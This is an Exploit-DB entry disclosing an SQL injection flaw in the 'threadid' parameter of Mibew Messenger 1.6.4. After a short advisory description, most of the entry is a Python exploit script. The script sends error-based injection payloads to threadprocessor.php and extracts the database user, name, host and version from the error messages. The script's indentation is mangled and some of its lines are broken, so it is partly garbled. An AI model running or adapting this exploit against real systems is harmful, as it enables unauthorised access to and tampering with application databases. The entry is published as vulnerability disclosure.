Mibew Messenger 1.6.4 'threadid' Parameter SQL Injection Vulnerability

2012-08-05T00:00:00
ID EDB-ID:37582
Type exploitdb
Reporter Ucha Gobejishvili
Modified 2012-08-05T00:00:00

Description

Mibew Messenger 1.6.4 'threadid' Parameter SQL Injection Vulnerability. Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/54857/info

Mibew Messenger is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Mibew Messenger 1.6.4 is vulnerable; other versions may also be affected. 

#!/usr/bin/python
#Author: Ucha Gobejishvili
#Timeline: 2012-08-05 Bug Discovered
#              2012-08-05 Public Disclosured
#Vendor: Mibew Web Messenger (http://mibew.org/ )
#Version: Mibew Messenger 1.6.4
#Demo: http://demo.mibew.org
#Introduction:
#Mibew Messenger (also known as Open Web Messenger) is an open-#source live
support application written in PHP and MySQL. It #enables one-on-one chat
assistance in real-time directly from #your website.

#Abstract:

#Discovered SQL injection Vulnerabilities on the Mibew Messenger #v.1.6.4.
A SQL Injection vulnerability is detected on the Mibew #Messenger v.1.6.4
The vulnerabilities allows an remote attacker #to execute own sql commands
on the affected applicationdbms. #Successful exploitation can result in
dbms, web-server or #application compromise.
# python Mibew.py -p localhost:8080 -t localhost:8500 -d /Patch/

import sys, httplib, urllib2, urllib, re
from optparse import OptionParser

usage = "./%prog [<options>] -t [target] -d [directory]"
usage += "\nExample: ./%prog -p localhost:8080 -t localhost:8500 -d
/coldcal/"

parser = OptionParser(usage=usage)
parser.add_option("-p", type="string",action="store", dest="proxy",
                  help="HTTP Proxy <server:port>")
parser.add_option("-t", type="string", action="store", dest="target",
                  help="The Target server <server:port>")
parser.add_option("-d", type="string", action="store", dest="directory",
                  help="Directory path to the CMS")
(options, args) = parser.parse_args()

def banner():
    print "\n\t|
----------------------------------------------------------- |"
    print "\t|  Mibew Web Messenger SQL Injection Vulnerability|"
    print "\t| |\n"

if len(sys.argv) < 5:
banner()
parser.print_help()
 sys.exit(1)

def getProxy():
try:
pr = httplib.HTTPConnection(options.proxy)
 pr.connect()
proxy_handler = urllib2.ProxyHandler({'http': options.proxy})
 except(socket.timeout):
print "\n(-) Proxy Timed Out"
sys.exit(1)
 except(),msg:
print "\n(-) Proxy Failed"
sys.exit(1)
 return proxy_handler

def setTargetHTTP():
if options.target[0:7] != 'http://':
 options.target = "http://" + options.target
return options.target
 def getRequest(exploit):
if options.proxy:
try:
 proxyfier = urllib2.build_opener(getProxy())
check = proxyfier.open(options.target+options.directory+exploit).read()
 except urllib2.HTTPError, error:
check = error.read()
except socket.error:
 print "(-) Proxy connection failed"
sys.exit(1)
else:
 try:
req = urllib2.Request(options.target+options.directory+exploit)
check = urllib2.urlopen(req).read()
 except urllib2.HTTPError, error:
check = error.read()
except urllib2.URLError:
 print "(-) Target connection failed, check your address"
sys.exit(1)
 return check

basicInfo = {'user: ':'user_name()', 'name: ':'db_name()', 'hostname:
':'host_name()','version: \n\n\t':'@@version'}

def basicSploit(info):
return "/operator/threadprocessor.php?threadid=1+and+1=convert(int," + info
+ ")--"

if __name__ == "__main__":
banner()
options.target = setTargetHTTP()
 print "(+) Exploiting target @: %s" % (options.target+options.directory)
if options.proxy:
 print "\n(+) Testing Proxy..."
print "(+) Proxy @ %s" % (options.proxy)
 print "(+) Building Handler.."

for key in basicInfo:
 getResp = getRequest(basicSploit(basicInfo[key]))
if re.findall("the nvarchar value '", getResp):
 dbInfo = getResp.split('the nvarchar value '')[1].split('' to data type
int')[0]
print "\n(!) Found database %s%s" % (key, dbInfo.rstrip())